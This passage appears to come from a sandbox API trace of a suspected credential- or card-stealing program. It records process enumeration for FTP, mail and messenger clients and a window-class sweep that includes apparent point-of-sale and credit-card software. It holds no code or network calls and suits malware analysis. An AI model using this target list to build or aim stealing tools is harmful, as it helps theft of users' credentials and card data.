Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0305.223] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0305.225] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0305.227] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0305.229] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0305.376] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0305.378] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0305.380] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0305.382] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0305.384] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0305.389] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0305.391] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0305.392] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0305.394] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0305.396] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0305.398] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0305.399] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0305.401] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0305.410] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0305.412] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0305.414] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0305.416] Process32Next (hSnapshot=0x1d4c, lppe=0x106efe20) Thread: id = 181 os_tid = 0xcac [0195.779] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) returned 1 [0195.779] GetClassNameA (in: hWnd=0x100ec, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Worker Window") returned 13 [0195.779] GetClassNameA (in: hWnd=0x1014a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0195.779] GetClassNameA (in: hWnd=0x1010e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0195.779] GetClassNameA (in: hWnd=0x1011c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0195.779] GetClassNameA (in: hWnd=0x10120, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0195.779] GetClassNameA (in: hWnd=0x10122, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0195.779] GetClassNameA (in: hWnd=0x1011e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0195.779] GetClassNameA (in: hWnd=0x1011a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0195.779] GetClassNameA (in: hWnd=0x10118, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0195.779] GetClassNameA (in: hWnd=0x10116, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0195.779] GetClassNameA (in: hWnd=0x10114, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0195.779] GetClassNameA (in: hWnd=0x10178, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0195.780] GetClassNameA (in: hWnd=0x1016a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0195.780] GetClassNameA (in: hWnd=0x1015a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0195.780] GetClassNameA (in: hWnd=0x10112, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0195.780] GetClassNameA (in: hWnd=0x10102, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="ApplicationManager_ImmersiveShellWindow") returned 39 [0195.780] GetClassNameA (in: hWnd=0x10198, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0195.780] GetClassNameA (in: hWnd=0x10196, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="VSyncHelper-00000000061A2330-1a4b5f2") returned 36 [0195.780] GetClassNameA (in: hWnd=0x1018e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="RawInputClass") returned 13 [0195.780] GetClassNameA (in: hWnd=0x10188, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0195.780] GetClassNameA (in: hWnd=0x100d8, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0195.780] GetClassNameA (in: hWnd=0x100b2, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0195.780] GetClassNameA (in: hWnd=0x100b6, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0195.780] GetClassNameA (in: hWnd=0x100c2, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0195.780] GetClassNameA (in: hWnd=0x100cc, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0195.780] GetClassNameA (in: hWnd=0x100d0, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0195.780] GetClassNameA (in: hWnd=0x10098, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0195.780] GetClassNameA (in: hWnd=0x100a6, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0195.780] GetClassNameA (in: hWnd=0x100ca, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0195.780] GetClassNameA (in: hWnd=0x1008c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Shell_TrayWnd") returned 13 [0195.780] GetClassNameA (in: hWnd=0x20030, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="ATL:00007FFA00814120") returned 20 [0195.781] GetClassNameA (in: hWnd=0x100e6, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0195.781] GetClassNameA (in: hWnd=0x100da, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0195.781] GetClassNameA (in: hWnd=0x80088, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0195.781] GetClassNameA (in: hWnd=0x103ac, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Federalhotelwindow") returned 18 [0195.781] GetClassNameA (in: hWnd=0x20254, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0195.781] GetClassNameA (in: hWnd=0x2024e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Bed_Fight_cls") returned 13 [0195.781] GetClassNameA (in: hWnd=0x103a6, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="StyleDesignbusinesswnd") returned 22 [0195.781] GetClassNameA (in: hWnd=0x103a8, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="NewDoorwindow") returned 13 [0195.781] GetClassNameA (in: hWnd=0x103a4, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="discussionwindow") returned 16 [0195.781] GetClassNameA (in: hWnd=0x1039a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="VSyncHelper-00861820-7f9fa25") returned 28 [0195.781] GetClassNameA (in: hWnd=0x10386, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="utg2cls") returned 7 [0195.781] GetClassNameA (in: hWnd=0x10384, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="spgagentserviceapp") returned 18 [0195.781] GetClassNameA (in: hWnd=0x10374, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="omniposwin") returned 10 [0195.781] GetClassNameA (in: hWnd=0x10370, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="mxslipstreamcls") returned 15 [0195.781] GetClassNameA (in: hWnd=0x10380, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="spcwinapp") returned 9 [0195.781] GetClassNameA (in: hWnd=0x202b4, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="TabThumbnailWindow") returned 18 [0195.781] GetClassNameA (in: hWnd=0x1036e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="isspos_cls") returned 10 [0195.781] GetClassNameA (in: hWnd=0x20288, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="fpos_class") returned 10 [0195.781] GetClassNameA (in: hWnd=0x10366, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="edcsvrcls") returned 9 [0195.781] GetClassNameA (in: hWnd=0x1035a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="centralcreditcardclass") returned 22 [0195.782] GetClassNameA (in: hWnd=0x10362, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="creditservice_class") returned 19 [0195.782] GetClassNameA (in: hWnd=0x1035c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="ccv_serverclass") returned 15 [0195.782] GetClassNameA (in: hWnd=0x1034e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="afr38_app") returned 9 [0195.782] GetClassNameA (in: hWnd=0x10350, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="aldelowin") returned 9 [0195.782] GetClassNameA (in: hWnd=0x10312, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="smartftp_cls") returned 12 [0195.782] GetClassNameA (in: hWnd=0x10332, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="active-chargewin") returned 16 [0195.782] GetClassNameA (in: hWnd=0x10334, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="accuposwnd") returned 10 [0195.782] GetClassNameA (in: hWnd=0x1032a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="winscp_win") returned 10 [0195.782] GetClassNameA (in: hWnd=0x1032c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="yahoomessengerwin") returned 17 [0195.782] GetClassNameA (in: hWnd=0x1030e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="thunderbirdwin") returned 14 [0195.782] GetClassNameA (in: hWnd=0x10326, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="whatsapp_class") returned 14 [0195.782] GetClassNameA (in: hWnd=0x1031e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="trillianwnd") returned 11 [0195.782] GetClassNameA (in: hWnd=0x102fe, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="scriptftpwnd") returned 12 [0195.782] GetClassNameA (in: hWnd=0x10320, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="webdrive_cls") returned 12 [0195.782] GetClassNameA (in: hWnd=0x102fa, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="pidgin_cls") returned 10 [0195.782] GetClassNameA (in: hWnd=0x10308, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="skype_wnd") returned 9 [0195.782] GetClassNameA (in: hWnd=0x102fc, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="outlookwindow") returned 13 [0195.782] GetClassNameA (in: hWnd=0x102f0, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="operamail_") returned 10 [0195.782] GetClassNameA (in: hWnd=0x102ea, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="ncftp_wnd") returned 9 [0195.782] GetClassNameA (in: hWnd=0x102e8, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="notepad") returned 7 [0195.782] GetClassNameA (in: hWnd=0x102e4, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="leechftp_wnd") returned 12 [0195.783] GetClassNameA (in: hWnd=0x102da, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="icq_app") returned 7 [0195.783] GetClassNameA (in: hWnd=0x102e0, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="gmailnotifierproapp") returned 19 [0195.783] GetClassNameA (in: hWnd=0x102de, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="foxmailincmail_") returned 15 [0195.783] GetClassNameA (in: hWnd=0x102c2, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="flashfxpcls") returned 11 [0195.783] GetClassNameA (in: hWnd=0x102c0, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="filezillaapp") returned 12 [0195.783] GetClassNameA (in: hWnd=0x102be, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="fling_window") returned 12 [0195.783] GetClassNameA (in: hWnd=0x102bc, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="coreftp") returned 7 [0195.783] GetClassNameA (in: hWnd=0x102ba, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="farapp") returned 6 [0195.783] GetClassNameA (in: hWnd=0x102a4, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="barcawindow") returned 11 [0195.783] GetClassNameA (in: hWnd=0x102ac, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="bitkinexwin") returned 11 [0195.783] GetClassNameA (in: hWnd=0x102a6, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="absolutetelnet_class") returned 20 [0195.783] GetClassNameA (in: hWnd=0x102a0, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="alftpwindow") returned 11 [0195.783] GetClassNameA (in: hWnd=0x10298, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="3dftp_class") returned 11 [0195.783] GetClassNameA (in: hWnd=0x10286, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0195.783] GetClassNameA (in: hWnd=0x1026a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="whose_class") returned 11 [0195.783] GetClassNameA (in: hWnd=0x10266, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="HairFriendwillwin") returned 17 [0195.783] GetClassNameA (in: hWnd=0x10260, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="involve") returned 7 [0195.783] GetClassNameA (in: hWnd=0x10262, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="religious_Free_Generation_win") returned 29 [0195.783] GetClassNameA (in: hWnd=0x1025a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Magazine_official_teach_") returned 24 [0195.783] GetClassNameA (in: hWnd=0x10258, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="SmallMoneywin") returned 13 [0195.784] GetClassNameA (in: hWnd=0x10234, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="fearFewwin") returned 10 [0195.784] GetClassNameA (in: hWnd=0x10250, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Common_trade_Station_wnd") returned 24 [0195.784] GetClassNameA (in: hWnd=0x1023e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="take_whether_cls") returned 16 [0195.784] GetClassNameA (in: hWnd=0x10240, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="bag_begin_Gas_window") returned 20 [0195.784] GetClassNameA (in: hWnd=0x10232, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="charge_Model_Ready_app") returned 22 [0195.784] GetClassNameA (in: hWnd=0x1021a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="degree_sing_Pretty_") returned 19 [0195.784] GetClassNameA (in: hWnd=0x1022e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="light_Where_app") returned 15 [0195.784] GetClassNameA (in: hWnd=0x10228, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Real_New_window") returned 15 [0195.784] GetClassNameA (in: hWnd=0x10226, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="work_Heavy_win") returned 14 [0195.784] GetClassNameA (in: hWnd=0x10224, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Letter_") returned 7 [0195.784] GetClassNameA (in: hWnd=0x10222, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="memberclass") returned 11 [0195.784] GetClassNameA (in: hWnd=0x10210, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Alternate Owner") returned 15 [0195.784] GetClassNameA (in: hWnd=0x10206, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0195.784] GetClassNameA (in: hWnd=0x10200, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0195.784] GetClassNameA (in: hWnd=0x101f2, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0195.784] GetClassNameA (in: hWnd=0x401dc, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0195.784] GetClassNameA (in: hWnd=0x2015e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0195.784] GetClassNameA (in: hWnd=0x2013a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IEFrame") returned 7 [0195.784] GetClassNameA (in: hWnd=0x101e4, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0195.784] GetClassNameA (in: hWnd=0x30042, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0195.784] GetClassNameA (in: hWnd=0x2013e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0195.785] GetClassNameA (in: hWnd=0x2013c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0195.785] GetClassNameA (in: hWnd=0x20138, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0195.785] GetClassNameA (in: hWnd=0x20148, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0195.785] GetClassNameA (in: hWnd=0x10236, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0195.785] GetClassNameA (in: hWnd=0x101ca, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="ATL:00007FFA08097080") returned 20 [0195.785] GetClassNameA (in: hWnd=0x101be, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0195.785] GetClassNameA (in: hWnd=0x101b0, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="SystemTray_Main") returned 15 [0195.785] GetClassNameA (in: hWnd=0x101ac, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0195.785] GetClassNameA (in: hWnd=0x101aa, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0195.785] GetClassNameA (in: hWnd=0x10126, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0195.785] GetClassNameA (in: hWnd=0x1012e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="TabletModeCoverWindow") returned 21 [0195.785] GetClassNameA (in: hWnd=0x101a0, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0195.785] GetClassNameA (in: hWnd=0x101a2, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0195.785] GetClassNameA (in: hWnd=0x1012c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="DummyDWMListenerWindow") returned 22 [0195.785] GetClassNameA (in: hWnd=0x10124, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0195.785] GetClassNameA (in: hWnd=0x1010a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="PushNotificationsPowerManagement") returned 32 [0195.785] GetClassNameA (in: hWnd=0x10108, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0195.785] GetClassNameA (in: hWnd=0x10100, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="ApplicationManager_DesktopShellWindow") returned 37 [0195.785] GetClassNameA (in: hWnd=0x100fc, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0195.785] GetClassNameA (in: hWnd=0x100f6, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0195.786] GetClassNameA (in: hWnd=0x100f4, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0195.786] GetClassNameA (in: hWnd=0x200e0, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0195.786] GetClassNameA (in: hWnd=0x100ce, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0195.786] GetClassNameA (in: hWnd=0x2001e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0195.786] GetClassNameA (in: hWnd=0x20034, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0195.786] GetClassNameA (in: hWnd=0x20036, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0195.786] GetClassNameA (in: hWnd=0x2004c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="PNIHiddenWnd") returned 12 [0195.786] GetClassNameA (in: hWnd=0x101d4, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0195.786] GetClassNameA (in: hWnd=0x200f2, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0195.786] GetClassNameA (in: hWnd=0x200ee, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0195.786] GetClassNameA (in: hWnd=0x100ba, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0195.786] GetClassNameA (in: hWnd=0x2007c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0195.786] GetClassNameA (in: hWnd=0x20072, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0195.786] GetClassNameA (in: hWnd=0x4006e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0195.786] GetClassNameA (in: hWnd=0x10024, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Dwm") returned 3 [0195.786] GetClassNameA (in: hWnd=0x10180, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="CicLoaderWndClass") returned 17 [0195.786] GetClassNameA (in: hWnd=0x1036a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0195.786] GetClassNameA (in: hWnd=0x100de, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Progman") returned 7 [0195.786] GetClassNameA (in: hWnd=0x1014c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.786] GetClassNameA (in: hWnd=0x1017a, lpClassName=0x1076fd50, nMaxCount=260 | 